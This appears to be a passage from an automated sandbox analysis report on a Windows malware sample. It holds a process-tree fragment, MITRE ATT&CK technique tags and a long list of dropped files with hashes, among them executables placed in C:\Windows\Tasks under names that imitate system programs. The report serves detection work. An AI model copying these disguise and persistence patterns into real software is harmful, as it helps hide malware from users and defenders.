- Suspicious use of SetWindowsHookEx
PID:756

C:\programdata\wininit.exe
C:\programdata\wininit.exe --service
1⤵
- Executes dropped EXE
PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

New Service

T1050

Modify Existing Service

T1031

Privilege Escalation

New Service

T1050

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\migrate.exe
Filesize
6.6MB

MD5
27216b55a4915b7b0a845367bfe7be2b

SHA1
6e4599d5f5d981079902ac44dc002257af0f9f97

SHA256
70df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7

SHA512
6b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00

Download Submit
C:\ProgramData\wininit.exe
Filesize
3.0MB

MD5
5eb90fbd6a3a7717813147268893adb3

SHA1
4ee216a39f727f01c08ccbac3d7d756fa35369da

SHA256
7cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa

SHA512
0aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
750c3aaa98f4d52c542fa11ec48b76b2

SHA1
a8a22493495e7400818dd3914f3cb9b89e47e64f

SHA256
6712879ffa111bfbf0df2c3ad516022f548c2abd93f67d450717fd0cd403e4d3

SHA512
e32af9b769cac08febcb66196d0676cbaabda28f8278e30b52aeb216fb2da9e8ec5a9f5f35875a5887c38ca28100c71795384a5e821c6bd46d4d464d15b26dff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
4916f1337d20d5bd877f025e83e38821

SHA1
b9306acacedf9bb7f3b82f2a84cc962a85fd08de

SHA256
e950a8777a2e353c31aaa749e7d9c2ad05c5125033b5690248243f54d3847f47

SHA512
bbe3be7eacc66670480725e80d63672a7dbb610927fe4e3b88b1c138321aed0d494946bd92d4d6992123f1f481d306dd52305412af396cdbb71d4f8c7e4b6047

Download Submit
C:\Windows\Migration\any.exe
Filesize
3.3MB

MD5
447be2890d99477c8237d3c72f69e442

SHA1
4b139f515cee56f20b084060a6dabf8830475e8d

SHA256
20d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c

SHA512
fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6

Download Submit
C:\Windows\TEMP\~Mp49ED.tmp\PlayerAssistant.dll
Filesize
64KB

MD5
1dff2e673c8801edcd8ded325a774c7f

SHA1
d3c0e1eb71f1c22b825b3a798f154e586fbccdba

SHA256
d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003

SHA512
04ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f

Download Submit
C:\Windows\TEMP\~Mp49ED.tmp\SureKeyboardState.dll
Filesize
63KB

MD5
8110a3c2e92470944acf50dd71521eca

SHA1
9eef6d02b1d8afc5a560010ff0af34c8b2a4dd06

SHA256
94fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0

SHA512
27603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793

Download Submit
C:\Windows\TEMP\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
C:\Windows\Tasks\ApplicationsFrameHost.exe
Filesize
8.4MB

MD5
9e02819c5e84a3d8ff67b8cd8ce46b7a

SHA1
138948b1c856314768a066410800bf76909da4eb

SHA256
dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637

SHA512
54853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6

Download Submit
C:\Windows\Tasks\ApplicationsFrameHost.exe
Filesize
8.4MB

MD5
9e02819c5e84a3d8ff67b8cd8ce46b7a

SHA1
138948b1c856314768a066410800bf76909da4eb

SHA256
dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637

SHA512
54853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6

Download Submit
C:\Windows\Tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\Windows\Tasks\MSTask.exe
Filesize
4.1MB

MD5
815ac943fb14eb69d059299c89136de3

SHA1
c4cedd22bf42f46da0dd19f57e0859554c5898e1

SHA256
1670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d

SHA512
65829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5

Download Submit
C:\Windows\Tasks\MSTask.exe
Filesize
4.1MB

MD5
815ac943fb14eb69d059299c89136de3

SHA1
c4cedd22bf42f46da0dd19f57e0859554c5898e1

SHA256
1670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d

SHA512
65829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5

Download Submit
C:\Windows\Tasks\Superfetch.exe
Filesize
1.6MB

MD5
362ffce5c7c480702a615f1847191f62

SHA1
75aceaea1dfba0735212c2ab5cafc49257927f73

SHA256
9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53

SHA512
9a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f

Download Submit
C:\Windows\Tasks\Superfetch.exe
Filesize
1.6MB

MD5
362ffce5c7c480702a615f1847191f62

SHA1
75aceaea1dfba0735212c2ab5cafc49257927f73

SHA256
9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53

SHA512
9a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f

Download Submit
C:\Windows\Tasks\WinRing0x64.sys
Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
C:\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
C:\Windows\Tasks\config.json
Filesize
2KB

MD5
539a1647d56a708ef272fb6e6dc44ce0

SHA1
4650663f175cee001f7007644064b9c3ee557e4a

SHA256
a7e5316f965df9c2d1fd93ff3effb69f6dd4a416e6ba38e6f3644cb74b4a308b

SHA512
54ab7feec62eb812de9de32f59b583cfbf9878a55e1378878fe0b7def85418102b2daa592b98c142cfddec7c53c5f80ce99c52e29be61567195514976550bcd9

Download Submit
C:\Windows\Temp\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
C:\programdata\ru.bat
Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\windows\migration\any.bat
Filesize
1KB

MD5
820e231cced7dd284bca641bae7e4f7f

SHA1
84006f6aa9eb42dcbf5561b4a581c83e15e9058a

SHA256
1c6c567df282f77e51b4fe86cec37e8a9910374a6196216a55d35a674478ed25

SHA512
14e056b01061bc665f9ead489bc42cb201b846cc05ff9a3172ad22a1d106d31a25a6edf48eb841aa516ced60d105d5495bd00b89bef71661f15d7b9a2953e87f

Download Submit
C:\windows\tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\windows\tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\windows\tasks\run.bat
Filesize
489B

MD5
8098a70564ca959e392fea0b77e05b6f

SHA1
4f7943d6e30839293cbe1dc0dc4dbd5fb3fc1d78

SHA256
47cd7dd51cad3ebc215d3ee835c2f0a4ea9785300e03cd3e6b4ea1195c557807

SHA512
b5d610564d8af52648b2cbb83fc94b48393a68e71f15ab8f56e5c0063aa0034ec37943e36160a1770cf538d799eb92e55b83332fde1a82b11ada92220fc5c8f3

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\programdata\migrate.exe
Filesize
6.6MB

MD5
27216b55a4915b7b0a845367bfe7be2b

SHA1
6e4599d5f5d981079902ac44dc002257af0f9f97

SHA256
70df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7

SHA512
6b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00

Download Submit
\??\c:\programdata\st.bat
Filesize
3KB

MD5
a4355470a8f18c272559306aeb81d7c7

SHA1
d38b25db4da4a14bbc77b01460dd2e4e938badb0

SHA256
109a5870e28ce94a7addff3a35ab4291ada7d7be87befed1edca2f729437ac08

SHA512
b8c2c5259b448f847b883ca7b13c4d92c896148d15eb5ee8c7f3084bf8b7a75af722f6cdbeabe1a6c67346d2958ddece6d7d568d39d70df2135f7514393ab94a

Download Submit
\??\c:\windows\migration\any.exe
Filesize
3.3MB

MD5
447be2890d99477c8237d3c72f69e442

SHA1
4b139f515cee56f20b084060a6dabf8830475e8d

SHA256
20d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c

SHA512
fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6

Download Submit
\??\c:\windows\migration\wininit.exe
Filesize
3.0MB

MD5
5eb90fbd6a3a7717813147268893adb3

SHA1
4ee216a39f727f01c08ccbac3d7d756fa35369da

SHA256
7cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa

SHA512
0aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a

Download Submit
\??\c:\windows\temp\~mp49ed.tmp\gslib_ui_defresu.dll
Filesize
250KB

MD5
3fa6b348f74d0099fc30f9e383a9ada7

SHA1
880360ed156fc6cb31f8f4538b5df47974e1472e

SHA256
3fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc

SHA512
71fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a

Download Submit
\ProgramData\migrate.exe
Filesize
6.6MB

MD5
27216b55a4915b7b0a845367bfe7be2b

SHA1
6e4599d5f5d981079902ac44dc002257af0f9f97

SHA256
70df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7

SHA512
6b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00

Download Submit
\Windows\Migration\any.exe
Filesize
3.3MB

MD5
447be2890d99477c8237d3c72f69e442

SHA1
4b139f515cee56f20b084060a6dabf8830475e8d

SHA256
20d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c

SHA512
fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6

Download Submit
\Windows\Tasks\ApplicationsFrameHost.exe
Filesize
8.4MB

MD5
9e02819c5e84a3d8ff67b8cd8ce46b7a

SHA1
138948b1c856314768a066410800bf76909da4eb

SHA256
dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637

SHA512
54853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6

Download Submit
\Windows\Tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
\Windows\Tasks\Superfetch.exe
Filesize
1.6MB

MD5
362ffce5c7c480702a615f1847191f62

SHA1
75aceaea1dfba0735212c2ab5cafc49257927f73

SHA256
9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53

SHA512
9a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
\Windows\Temp\~Mp49ED.tmp\PlayerAssistant.dll
Filesize
64KB

MD5
1dff2e673c8801edcd8ded325a774c7f

SHA1
d3c0e1eb71f1c22b825b3a798f154e586fbccdba

SHA256
d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003

SHA512
04ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f

Download Submit
\Windows\Temp\~Mp49ED.tmp\SureKeyboardState.dll
Filesize
63KB

MD5
8110a3c2e92470944acf50dd71521eca

SHA1
9eef6d02b1d8afc5a560010ff0af34c8b2a4dd06

SHA256
94fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0

SHA512
27603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793

Download Submit
\Windows\Temp\~Mp49ED.tmp\gslib_ui_defresu.dll
Filesize
250KB

MD5
3fa6b348f74d0099fc30f9e383a9ada7

SHA1
880360ed156fc6cb31f8f4538b5df47974e1472e

SHA256
3fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc

SHA512
71fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a

Download Submit
\Windows\Temp\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
\Windows\Temp\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
\Windows\Temp\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
\Windows\Temp\~Mp49ED.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
memory/280-78-0x0000000000000000-mapping.dmp

Download
memory/472-92-0x0000000000000000-mapping.dmp

Download
memory/584-201-0x0000000000000000-mapping.dmp

Download
memory/584-131-0x0000000000000000-mapping.dmp

Download
memory/604-87-0x0000000000000000-mapping.dmp

Download
memory/624-148-0x0000000000000000-mapping.dmp

Download
memory/624-67-0x0000000000000000-mapping.dmp

Download
memory/684-179-0x0000000000000000-mapping.dmp

Download
memory/756-153-0x0000000000000000-mapping.dmp

Download
memory/776-183-0x0000000000B00000-0x0000000001732000-memory.dmp

Filesize
12.2MB

Download
memory/776-188-0x0000000000B00000-0x0000000001732000-memory.dmp

Filesize
12.2MB

Download
memory/776-62-0x0000000000000000-mapping.dmp

Download
memory/844-196-0x0000000000000000-mapping.dmp

Download
memory/844-75-0x0000000000000000-mapping.dmp

Download
memory/844-108-0x0000000000000000-mapping.dmp

Download
memory/848-180-0x0000000000000000-mapping.dmp

Download
memory/848-107-0x0000000000000000-mapping.dmp

Download
memory/864-81-0x0000000000000000-mapping.dmp

Download
memory/948-88-0x0000000000000000-mapping.dmp

Download
memory/968-173-0x0000000000000000-mapping.dmp

Download
memory/972-69-0x0000000000000000-mapping.dmp

Download
memory/976-174-0x0000000000000000-mapping.dmp

Download
memory/992-193-0x0000000000000000-mapping.dmp

Download
memory/1044-177-0x0000000000000000-mapping.dmp

Download
memory/1060-139-0x0000000000000000-mapping.dmp

Download
memory/1160-54-0x0000000075581000-0x0000000075583000-memory.dmp

Filesize
8KB

Download
memory/1196-68-0x0000000000000000-mapping.dmp

Download
memory/1196-170-0x0000000000000000-mapping.dmp

Download
memory/1280-143-0x0000000000000000-mapping.dmp

Download
memory/1292-72-0x0000000000000000-mapping.dmp

Download
memory/1312-123-0x0000000000000000-mapping.dmp

Download
memory/1316-116-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1316-114-0x0000000000000000-mapping.dmp

Download
memory/1364-147-0x0000000000000000-mapping.dmp

Download
memory/1428-144-0x0000000000000000-mapping.dmp

Download
memory/1492-178-0x0000000000000000-mapping.dmp

Download
memory/1496-74-0x0000000000000000-mapping.dmp

Download
memory/1512-166-0x0000000000000000-mapping.dmp

Download
memory/1532-89-0x0000000000000000-mapping.dmp

Download
memory/1556-85-0x0000000000000000-mapping.dmp

Download
memory/1556-192-0x0000000000000000-mapping.dmp

Download
memory/1624-100-0x0000000000000000-mapping.dmp

Download
memory/1636-76-0x0000000000000000-mapping.dmp

Download
memory/1644-77-0x0000000000000000-mapping.dmp

Download
memory/1660-91-0x0000000000000000-mapping.dmp

Download
memory/1692-125-0x0000000000000000-mapping.dmp

Download
memory/1692-164-0x0000000000000000-mapping.dmp

Download
memory/1700-120-0x0000000000000000-mapping.dmp

Download
memory/1728-128-0x0000000000000000-mapping.dmp

Download
memory/1728-167-0x0000000000620000-0x0000000000640000-memory.dmp

Filesize
128KB

Download
memory/1728-140-0x00000000005D0000-0x00000000005F0000-memory.dmp

Filesize
128KB

Download
memory/1760-129-0x0000000000000000-mapping.dmp

Download
memory/1776-84-0x0000000000000000-mapping.dmp

Download
memory/1804-98-0x0000000000000000-mapping.dmp

Download
memory/1804-63-0x0000000000000000-mapping.dmp

Download
memory/1804-66-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/1880-124-0x0000000000000000-mapping.dmp

Download
memory/1916-86-0x0000000000000000-mapping.dmp

Download
memory/1920-70-0x0000000000000000-mapping.dmp

Download
memory/1932-73-0x0000000000000000-mapping.dmp

Download
memory/1960-90-0x0000000000000000-mapping.dmp

Download
memory/1968-57-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/1968-55-0x0000000000000000-mapping.dmp

Download
memory/1996-58-0x0000000000000000-mapping.dmp

Download
memory/2000-60-0x0000000000000000-mapping.dmp

Download
memory/2016-126-0x0000000000000000-mapping.dmp

Download
memory/2020-122-0x0000000000000000-mapping.dmp

Download
memory/2040-118-0x0000000073EA0000-0x000000007444B000-memory.dmp

Filesize
5.7MB

Download
memory/2040-102-0x0000000000000000-mapping.dmp

Download
memory/2040-71-0x0000000000000000-mapping.dmp

Download
memory/2044-94-0x0000000000000000-mapping.dmp

Download